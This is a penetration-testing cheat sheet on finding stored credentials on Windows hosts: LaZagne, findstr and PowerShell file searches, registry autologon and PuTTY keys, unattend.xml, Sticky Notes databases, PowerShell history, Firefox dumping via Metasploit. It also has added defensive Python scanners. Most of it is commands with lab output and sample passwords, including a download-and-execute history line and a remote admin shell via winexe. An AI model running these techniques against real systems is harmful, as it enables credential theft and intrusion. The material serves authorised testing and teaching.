# Credentials Hunting

## Key Terms to Search For

| Passwords     | Passphrases  | Keys        |
| ------------- | ------------ | ----------- |
| Username      | User account | Creds       |
| Users         | Passkeys     | Passphrases |
| configuration | dbcredential | dbpassword  |
| pwd           | Login        | Credentials |

## Search tools

<figure><img src="/files/XLFuOtEnJnWCwl1hTevc" alt=""><figcaption></figcaption></figure>

### Lazagne

{% embed url="<https://github.com/AlessandroZ/LaZagne>" %}

```cmd-session
C:\Users\bob\Desktop> start lazagne.exe all
```

```cmd-session
|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|


########## User: bob ##########

------------------- Winscp passwords -----------------

[+] Password found !!!
URL: 10.129.202.51
Login: admin
Password: SteveisReallyCool123
Port: 22
```

### SessionGopher

{% embed url="<https://github.com/Arvanaghi/SessionGopher>" %}

```powershell-session
PS C:\htb> Import-Module .\SessionGopher.ps1
 
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01
```

### **EvilTree - Regex**

{% embed url="<https://github.com/t3l3machus/eviltree>" %}

* Regex to look for passwords: `-x ".{0,3}passw.{0,3}[=]{1}.{0,18}"`
* Keywords to look for sensitive info: `-k passw,db_,admin,account,user,token`

```
python3 eviltree.py -r C:\xampp -k password,passwd,admin -i -v -q 
```
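The key-terms table and the EvilTree regex above are the two matching strategies this page uses (plain keywords and a password-assignment pattern). The following is an added example, not code from this page or from EvilTree: a small portable audit scanner in Python that applies both to a directory tree, restricted to the file types the findstr examples target. All file names and contents are constructed, the password values are placeholders, and the function names are my own.

```python
import re
import tempfile
from pathlib import Path

# Search terms from the key-terms table at the top of the page. "user", "users"
# and "configuration" are left out here: they match far too many harmless lines.
KEY_TERMS = [
    "password", "passphrase", "passkey", "creds", "credential",
    "dbcredential", "dbpassword", "pwd", "login",
]

# EvilTree's password regex from above: up to 3 characters, "passw", up to 3
# characters, exactly one "=", then up to 18 characters of value.
PASSWORD_ASSIGNMENT = re.compile(r".{0,3}passw.{0,3}[=]{1}.{0,18}", re.IGNORECASE)

# File types the findstr examples on this page target.
INTERESTING_EXT = {".txt", ".ini", ".cfg", ".config", ".xml", ".ps1", ".yml"}


def scan_line(line):
    """Return the reasons a line is interesting (empty list when it is not)."""
    reasons = []
    lowered = line.lower()
    for term in KEY_TERMS:
        if term in lowered:
            reasons.append("keyword:" + term)
    if PASSWORD_ASSIGNMENT.search(line):
        reasons.append("regex:password-assignment")
    return reasons


def scan_tree(root):
    """Walk root and scan files with interesting extensions.

    Returns (relative path, line number, reasons) tuples. The matching line
    itself is deliberately not returned: an audit report that copies every hit
    verbatim becomes a credential file of its own.
    """
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in INTERESTING_EXT:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable files are skipped, not fatal
        for number, line in enumerate(text.splitlines(), start=1):
            reasons = scan_line(line)
            if reasons:
                findings.append((path.relative_to(root).as_posix(), number, reasons))
    return findings


def build_sample_tree():
    """Create a constructed directory that mimics an application folder."""
    root = Path(tempfile.mkdtemp(prefix="credhunt_"))
    (root / "app").mkdir()
    (root / "app" / "web.config").write_text(
        "<connectionStrings>\n"
        '  <add name="db" connectionString="Server=sql01;User Id=app;dbpassword=PLACEHOLDER" />\n'
        "</connectionStrings>\n"
    )
    # "password = " has a space before "=", which the EvilTree regex does not allow
    (root / "notes.txt").write_text("todo list\nsvc password = PLACEHOLDER\n")
    (root / "deploy.ps1").write_text("Connect-Thing -Login admin\n")
    (root / "readme.md").write_text("password=not scanned, .md is not an interesting extension\n")
    (root / "data.bin").write_bytes(b"\x00password=\x00")
    return root


if __name__ == "__main__":
    for rel, number, reasons in scan_tree(build_sample_tree()):
        print(f"{rel}:{number}: {', '.join(reasons)}")
```

Note that `notes.txt` is caught by the keyword but not by the regex: the EvilTree pattern allows at most three characters between `passw` and `=`, so `password = x` slips past it while `password=x` does not. Running both matchers, as above, covers that gap.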

<figure><img src="/files/BgqNdtAbZdh0mNovZSD3" alt=""><figcaption></figcaption></figure>

### Findstr

{% hint style="info" %}
*Start at C:\Users*
{% endhint %}

```cmd-session
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
```

```cmd-session
c:\htb>findstr /s /i cred n:\*.*

n:\Contracts\private\secret.txt:file with all credentials
n:\Contracts\private\credentials.txt:admin:SecureCredentials!
```

{% content-ref url="/pages/iqCGrD8UwioPoZC3mZxK" %}
[Find specific file](/0xss0rz/pentest/privilege-escalation/find-specific-file.md)
{% endcontent-ref %}

```
C:\> for /R %i in (*) do @findstr /I /C:"pass" "%i" >nul && echo %i
```

```
C:\> for /R %i in (*.conf *.txt *.bat *.ps1) do @findstr /I /C:"pass" "%i" >nul && echo %i
```

```cmd-session
C:\htb> cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt
```

```cmd-session
C:\htb> findstr /si password *.xml *.ini *.txt *.config

stuff.txt:password: l#-x9r11_2_GL!
```

```cmd-session
C:\htb> findstr /spin "password" *.*

stuff.txt:1:password: l#-x9r11_2_GL!
```

```cmd-session
C:\htb> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

c:\inetpub\wwwroot\web.config
```

### dir

```cmd-session
C:\htb>dir n:\*cred* /s /b

n:\Contracts\private\credentials.txt


C:\htb>dir n:\*secret* /s /b

n:\Contracts\private\secret.txt
```

### Powershell

```powershell-session
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

    Directory: N:\Contracts\private

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/23/2022   4:36 PM             25 credentials.txt
```

```powershell-session
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

N:\Contracts\private\secret.txt:1:file with all credentials
N:\Contracts\private\credentials.txt:1:admin:SecureCredentials!
```

```powershell-session
PS C:\htb> select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password

stuff.txt:1:password: l#-x9r11_2_GL!
```

## Cmdkey Saved Credentials

```cmd-session
C:\htb> cmdkey /list

    Target: LegacyGeneric:target=TERMSRV/SQL01
    Type: Generic
    User: inlanefreight\bob
	
```

<figure><img src="/files/2dwKN4kSH4yvKBSqo6H3" alt=""><figcaption></figcaption></figure>

Run a command as the user whose credential is saved:

```powershell-session
PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"
```

## Passwords - Registry

The registry can be searched for keys and values containing the word "password": `reg query HKLM /f password /t REG_SZ /s`

To save time, query this key directly for AutoLogon credentials: `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"`

On Kali, use winexe to spawn a command prompt running with admin privileges (replace the password with the one found): `winexe -U 'admin%password' //10.10.149.66 cmd.exe`

## Application Configuration Files

{% hint style="info" %}
*Start at C:\Users*
{% endhint %}

```powershell-session
PS C:\htb> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
```

Sensitive IIS information such as credentials may be stored in a `web.config` file.

<figure><img src="/files/jS6KHUqipibwnOWIZowS" alt=""><figcaption></figcaption></figure>

```powershell-session
PS C:\htb> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/25/2021   9:59 AM            329 web.config

<SNIP>
```

```cmd-session
C:\htb> where /R C:\ *.config

c:\inetpub\wwwroot\web.config
```

## PowerShell History File

PowerShell (through the PSReadLine module) stores command history in the file:

`C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`

```powershell-session
PS C:\htb> (Get-PSReadLineOption).HistorySavePath

C:\Users\htb-student\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

```powershell-session
PS C:\htb> gc (Get-PSReadLineOption).HistorySavePath

dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
```

One-liner to retrieve the contents of every PowerShell history file readable by the current user:

```powershell-session
PS C:\htb> foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
```

{% hint style="info" %}
*We should always recheck these files once we have local admin if our prior access did not allow us to read the files for some users.*
{% endhint %}

## PowerShell Credentials

Take, for example, the following script `Connect-VC.ps1`, which a sysadmin has created to connect to a vCenter server easily.

```powershell
# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword
```

**Decrypting PowerShell Credentials**

`Export-Clixml` protects the password with DPAPI, so the file can be decrypted in the context of the user who created it; otherwise DPAPI itself has to be abused.

```powershell-session
PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username

bob


PS C:\htb> $credential.GetNetworkCredential().password

Str0ng3ncryptedP@ss!
```

## Enumerate shares

{% content-ref url="/pages/oLBDCMau1SiUjBguWGst" %}
[Network Shares](/0xss0rz/pentest/internal-pentest/network-shares.md)
{% endcontent-ref %}

{% embed url="<https://www.thehacker.recipes/a-d/movement/credentials/dumping/network-shares>" %}

### Manspider

{% embed url="<https://github.com/blacklanternsecurity/MANSPIDER>" %}

```
manspider.py --threads 50 192.168.56.0/24 -d "$DOMAIN" -u "$USER" -H "$NT_HASH" --content administrateur
```

### Snaffler

{% embed url="<https://github.com/SnaffCon/Snaffler>" %}

## Netexec

```
nxc smb [IP] -u username -p password -M eventlog_creds
```

<figure><img src="/files/smtdFpQ3BBL6iFq40bdk" alt=""><figcaption></figcaption></figure>

## Other places to look

### Autologon

```cmd-session
C:\htb>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    
    <SNIP>
    
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    htb-student
    DefaultPassword    REG_SZ    HTB_@cademy_stdnt!
```
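The Winlogon query above and the `reg query HKLM /f password ... /s` search in the registry section both produce the same text layout. The following added example (mine, not from the page or any tool it references) parses that layout and classifies the AutoLogon configuration the way an audit would, distinguishing a readable `DefaultPassword` from an enabled autologon whose password lives elsewhere. The sample output is constructed and the password is a placeholder.

```python
import re

# A value line in `reg query` output: indented name, type, optional data,
# each separated by runs of spaces.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")

# Constructed sample in the shape of the Winlogon query above; the password is
# a placeholder, not a real value.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    htb-student
    DefaultDomainName    REG_SZ    INLANEFREIGHT
    DefaultPassword    REG_SZ    PLACEHOLDER_PASSWORD

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
    (Default)    REG_SZ    Group Policy extensions

End of search: 2 match(es) found.
"""


def parse_reg_query(output):
    """Parse `reg query` text into {key path: {value name: (type, data)}}.

    Key paths start in column 0 and begin with HK; value lines are indented.
    Anything else (blank lines, the "End of search" summary) is ignored.
    """
    keys = {}
    current = None
    for raw in output.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith(" ") and raw.upper().startswith("HK"):
            current = raw.strip()
            keys[current] = {}
            continue
        match = VALUE_LINE.match(raw)
        if match and current is not None:
            name, value_type, data = match.groups()
            keys[current][name] = (value_type, data.strip())
    return keys


def find_values_mentioning(keys, term):
    """The `reg query /f <term> /s` idea: value names or data containing term."""
    term = term.lower()
    hits = []
    for key_path, values in keys.items():
        for name, (_, data) in values.items():
            if term in name.lower() or term in data.lower():
                hits.append((key_path, name))
    return hits


def assess_autologon(values):
    """Classify a Winlogon value set:
      'disabled'       - AutoAdminLogon is absent or not "1"
      'plaintext'      - enabled and DefaultPassword is a readable REG_SZ
      'lsa-or-missing' - enabled without DefaultPassword: the password is
                         either in the DefaultPassword LSA secret (how the
                         Sysinternals Autologon tool stores it) or autologon
                         is misconfigured
    """
    enabled = values.get("AutoAdminLogon", ("REG_SZ", "0"))[1].strip() == "1"
    if not enabled:
        return "disabled"
    if values.get("DefaultPassword", ("REG_SZ", ""))[1]:
        return "plaintext"
    return "lsa-or-missing"


if __name__ == "__main__":
    parsed = parse_reg_query(SAMPLE_REG_OUTPUT)
    for key_path, values in parsed.items():
        if key_path.endswith("\\Winlogon"):
            print(key_path, "->", assess_autologon(values))
    print(find_values_mentioning(parsed, "password"))
```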

{% hint style="info" %}
*`Note:` If you absolutely must configure Autologon for your Windows system, it is recommended to use Autologon.exe from the Sysinternals suite, which will encrypt the password as an LSA secret.*
{% endhint %}

### Putty

```powershell-session
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
```

```powershell-session
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
    Present    REG_DWORD    0x1
    HostName    REG_SZ
    LogFileName    REG_SZ    putty.log
    
  <SNIP>
  
    ProxyDNS    REG_DWORD    0x1
    ProxyLocalhost    REG_DWORD    0x0
    ProxyMethod    REG_DWORD    0x5
    ProxyHost    REG_SZ    proxy
    ProxyPort    REG_DWORD    0x50
    ProxyUsername    REG_SZ    administrator
    ProxyPassword    REG_SZ    1_4m_th3_@cademy_4dm1n!    
```

### Passwords in Group Policy in the SYSVOL share

See Netexec - CME `module gpp`

{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}

### Passwords in scripts in the SYSVOL share

See:

* [Netexec - CME module](/0xss0rz/pentest/tools/netexec-cme.md)
* [Manspider](#manspider)

### Password in scripts on IT shares

<figure><img src="/files/M07kBviMDOtgu4gSFU4X" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/YqpWq88IHi2cuVwNztI2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/CPDiSiWpx1WIM208l8Lb" alt=""><figcaption></figcaption></figure>

### Passwords in `web.config` files on dev machines and IT shares

### `unattend.xml`

Search for `unattend.xml`:

```
PS C:\> Get-ChildItem -Path C:\ -Filter "unattend.xml" -Recurse -ErrorAction SilentlyContinue
```

```xml
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
    <settings pass="specialize">
        <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
            <AutoLogon>
                <Password>
                    <Value>local_4dmin_p@ss</Value>
                    <PlainText>true</PlainText>
                </Password>
                <Enabled>true</Enabled>
                <LogonCount>2</LogonCount>
                <Username>Administrator</Username>
            </AutoLogon>
            <ComputerName>*</ComputerName>
        </component>
    </settings>
```
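The `unattend.xml` above stores the AutoLogon password with `<PlainText>true</PlainText>`. The same file format also accepts `<PlainText>false</PlainText>`, in which case the value is only Base64 over the UTF-16LE password with the element name appended, not encryption. The following added example (mine, not from the page) is a namespace-aware parser that reports every `Password` or `AdministratorPassword` element and recovers the value in both forms; the sample document is constructed and both passwords are placeholders.

```python
import base64
import xml.etree.ElementTree as ET

UNATTEND_NS = "urn:schemas-microsoft-com:unattend"
NS = {"u": UNATTEND_NS}


def encode_unattend_password(password, tag):
    """How a "PlainText=false" value is stored: Base64 over the UTF-16LE
    encoding of password + element name. Obfuscation, not encryption."""
    return base64.b64encode((password + tag).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value, tag):
    """Inverse of encode_unattend_password; None when value is not decodable."""
    try:
        raw = base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    return raw[:-len(tag)] if raw.endswith(tag) else raw


def local_name(element):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return element.tag.rsplit("}", 1)[-1]


def find_unattend_passwords(xml_text):
    """Return every password stored in an unattend.xml, plaintext or encoded."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    # ElementTree has no parent pointers; build the map once to find the account
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for element in root.iter():
        tag = local_name(element)
        if tag not in ("Password", "AdministratorPassword"):
            continue
        value = (element.findtext("u:Value", default="", namespaces=NS) or "").strip()
        plain_flag = element.findtext("u:PlainText", default="true", namespaces=NS) or ""
        plaintext = plain_flag.strip().lower() == "true"
        owner = parent_of.get(element)
        account = None
        if owner is not None:  # AutoLogon uses <Username>, LocalAccount uses <Name>
            account = (owner.findtext("u:Username", namespaces=NS)
                       or owner.findtext("u:Name", namespaces=NS))
        findings.append({
            "account": account,
            "element": tag,
            "plaintext": plaintext,
            "password": value if plaintext else decode_unattend_password(value, tag),
        })
    return findings


def build_sample_unattend():
    """Constructed unattend.xml: an AutoLogon block in the shape shown above and
    a LocalAccount whose password is stored with PlainText=false."""
    encoded = encode_unattend_password("Placeholder1", "Password")
    return f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="{UNATTEND_NS}">
    <settings pass="specialize">
        <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
            <AutoLogon>
                <Password>
                    <Value>PLACEHOLDER_PASSWORD</Value>
                    <PlainText>true</PlainText>
                </Password>
                <Enabled>true</Enabled>
                <LogonCount>2</LogonCount>
                <Username>Administrator</Username>
            </AutoLogon>
        </component>
    </settings>
    <settings pass="oobeSystem">
        <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
            <UserAccounts>
                <LocalAccounts>
                    <LocalAccount>
                        <Password>
                            <Value>{encoded}</Value>
                            <PlainText>false</PlainText>
                        </Password>
                        <Name>svc_deploy</Name>
                    </LocalAccount>
                </LocalAccounts>
            </UserAccounts>
        </component>
    </settings>
</unattend>
"""


if __name__ == "__main__":
    for finding in find_unattend_passwords(build_sample_unattend()):
        print(finding)
```

The defensive takeaway is that both findings come back with a usable password: `PlainText=false` changes nothing about the exposure, so answer files left on a deployed system should be removed or have their password elements blanked after setup.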

### Passwords in the AD user or computer description fields

* See Netexec - CME `module users`

{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}

### **StickyNotes DB Files**

```powershell-session
PS C:\htb> ls
 
 
    Directory: C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/25/2021  11:59 AM          20480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
-a----         5/25/2021  11:59 AM            982 Ecs.dat
-a----         5/25/2021  11:59 AM           4096 plum.sqlite
-a----         5/25/2021  11:59 AM          32768 plum.sqlite-shm
-a----         5/25/2021  12:00 PM         197792 plum.sqlite-wal
```

Copy the three `plum.sqlite*` files down to our system, open them with a tool such as [DB Browser for SQLite](https://sqlitebrowser.org/dl/), and view the `Text` column of the `Note` table with the query `select Text from Note;`.

<figure><img src="/files/oQJ8iXUJgksuX4HwbLmv" alt=""><figcaption></figcaption></figure>

#### With Powershell

{% embed url="<https://github.com/RamblingCookieMonster/PSSQLite>" %}

```powershell-session
PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A

PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
 
Text
----
\id=de368df0-6939-4579-8d38-0fda521c9bc4 vCenter
\id=e4adae4c-a40b-48b4-93a5-900247852f96
\id=1a44a631-6fff-4961-a4df-27898e9e1e65 root:Vc3nt3R_adm1n!
\id=c450fc5f-dc51-4412-b4ac-321fd41c522a Thycotic demo tomorrow at 10am
```

#### **Strings**

```shell-session
0xss0rz@htb[/htb]$  strings plum.sqlite-wal

CREATE TABLE "Note" (
"Text" varchar ,
"WindowPosition" varchar ,
"IsOpen" integer ,
"IsAlwaysOnTop" integer ,
"CreationNoteIdAnchor" varchar ,
"Theme" varchar ,
"IsFutureNote" integer ,
"RemoteId" varchar ,
"ChangeKey" varchar ,
"LastServerVersion" varchar ,
"RemoteSchemaVersion" integer ,
"IsRemoteDataInvalid" integer ,
"PendingInsightsScan" integer ,
"Type" varchar ,
"Id" varchar primary key not null ,
"ParentId" varchar ,
"CreatedAt" bigint ,
"DeletedAt" bigint ,
"UpdatedAt" bigint )'
indexsqlite_autoindex_Note_1Note
af907b1b-1eef-4d29-b238-3ea74f7ffe5caf907b1b-1eef-4d29-b238-3ea74f7ffe5c
U	af907b1b-1eef-4d29-b238-3ea74f7ffe5c
Yellow93b49900-6530-42e0-b35c-2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c
U	93b49900-6530-42e0-b35c-2663989ae4b3


< SNIP >

\id=011f29a4-e37f-451d-967e-c42b818473c2 vCenter
\id=34910533-ddcf-4ac4-b8ed-3d1f10be9e61 alright*
\id=ffaea2ff-b4fc-4a14-a431-998dc833208c root:Vc3nt3R_adm1n!ManagedPosition=Yellow93b49900-6530-42e0-b35c-2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c
```
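The two approaches above, `SELECT Text FROM Note` and `strings plum.sqlite-wal`, can give different results, and the reason is worth seeing rather than taking on faith: Sticky Notes keeps the database in WAL mode, so the write-ahead log still carries page images of notes that have since been deleted. The following added example (mine, not from the page or from PSSQLite) builds a constructed `plum.sqlite` with a trimmed version of the `Note` schema shown above, deletes the note holding a credential, and then shows that the SQL query no longer returns it while the raw `-wal` bytes still do. The note texts reuse the `\id=` anchor format shown above; the credential is a placeholder.

```python
import re
import sqlite3
import tempfile
from pathlib import Path

# Sticky Notes prefixes the text with an in-note anchor: \id=<guid> <text>
ID_PREFIX = re.compile(r"^\\id=[0-9a-fA-F-]{36}\s*")
# A crude "user:password" shape, enough to flag notes worth a second look
USER_PASS = re.compile(r"^[\w.@-]+:\S+$")

# Constructed notes in the shape seen above; the credential is a placeholder.
SAMPLE_NOTES = [
    ("\\id=de368df0-6939-4579-8d38-0fda521c9bc4 vCenter", "Yellow", "note-1"),
    ("\\id=1a44a631-6fff-4961-a4df-27898e9e1e65 root:PLACEHOLDER_PASSWORD", "Yellow", "note-2"),
    ("\\id=c450fc5f-dc51-4412-b4ac-321fd41c522a Thycotic demo tomorrow at 10am", "Blue", "note-3"),
]


def strip_id_prefix(text):
    return ID_PREFIX.sub("", text)


def credential_like(texts):
    """Return the note texts that look like user:password pairs."""
    return [t for t in texts if USER_PASS.match(t)]


def create_sample_plum(directory):
    """Create plum.sqlite in WAL mode (as Sticky Notes does), store the sample
    notes, then delete the one holding the credential. Returns the open
    connection and the path; the connection must stay open while the -wal
    file is inspected, because closing the last connection checkpoints and
    removes it."""
    db_path = Path(directory) / "plum.sqlite"
    conn = sqlite3.connect(db_path, isolation_level=None)  # autocommit
    conn.execute("PRAGMA journal_mode=WAL")
    # Trimmed to the columns this example needs; the full schema is in the
    # strings output above.
    conn.execute('CREATE TABLE "Note" ("Text" varchar, "Theme" varchar, '
                 '"Id" varchar primary key not null)')
    conn.executemany('INSERT INTO "Note" ("Text", "Theme", "Id") VALUES (?, ?, ?)',
                     SAMPLE_NOTES)
    conn.execute('DELETE FROM "Note" WHERE "Id" = ?', ("note-2",))
    return conn, db_path


def live_note_texts(db_path):
    """What `SELECT Text FROM Note` returns: only notes that still exist."""
    reader = sqlite3.connect(db_path)
    rows = reader.execute('SELECT "Text" FROM "Note"').fetchall()
    reader.close()
    return [strip_id_prefix(row[0]) for row in rows]


def wal_residue(db_path, needle):
    """Scan plum.sqlite-wal the way `strings` would: is needle still in there?"""
    wal = Path(str(db_path) + "-wal")
    return wal.exists() and needle.encode("utf-8") in wal.read_bytes()


if __name__ == "__main__":
    conn, db_path = create_sample_plum(tempfile.mkdtemp(prefix="stickynotes_"))
    print("live notes:", live_note_texts(db_path))
    print("credential still in WAL:", wal_residue(db_path, "root:PLACEHOLDER_PASSWORD"))
    conn.close()
```

This is also why the page says to copy all three `plum.sqlite*` files: committed notes that have not been checkpointed yet exist only in the `-wal` file, and a copy of `plum.sqlite` on its own may be missing them entirely.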

### KeePass databases

Pull the hash, crack it, and the database usually opens up a great deal of access. See [Keepass](#keepass-databases-kdbx)

### Found on user systems and shares

### Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint

#### [Enumerate shares](#enumerate-shares)

#### Specific file

{% content-ref url="/pages/iqCGrD8UwioPoZC3mZxK" %}
[Find specific file](/0xss0rz/pentest/privilege-escalation/find-specific-file.md)
{% endcontent-ref %}

<figure><img src="/files/FOjIOTqVeUbj4sTKSCwQ" alt=""><figcaption></figcaption></figure>

### **Other Interesting Files**

```shell-session
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
```

## DPAPI

{% content-ref url="/pages/AuiqXLaBGIsWxrySc55w" %}
[DPAPI](/0xss0rz/pentest/internal-pentest/dpapi.md)
{% endcontent-ref %}

## Firefox

### Lazagne

{% embed url="<https://github.com/AlessandroZ/LaZagne>" %}

```
laZagne.exe browsers
```

### Netexec - CME

Use the `firefox` module:

```
[Apr 09, 2024 - 08:28:05 (EDT)] exegol-CPTS /workspace # cme smb -L
[*] firefox                   Dump credentials from Firefox
```

### Metasploit

```
 meterpreter > run post/multi/gather/firefox_creds

[*] Checking for Firefox directory in: C:\Documents and Settings\Administrator\Application Data\Mozilla\
[*] Found Firefox installed
[*] Locating Firefox Profiles...

[+] Found Profile 8r4i3uac.default
[+] Downloading cookies.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading cookies.sqlite-journal file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading key3.db file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading signons.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
meterpreter >
```

## **Chrome**

{% hint style="success" %}
*For more tools - See* [*Post Exploit - Browsers Cookies*](/0xss0rz/pentest/post-exploitation/gather-credentials-and-more/browser-cookies.md)
{% endhint %}

{% embed url="<https://github.com/GhostPack/SharpDPAPI>" %}

{% embed url="<https://github.com/0xSs0rZ/Windows_PrivEsc_Tools_precompiled>" %}

```powershell-session
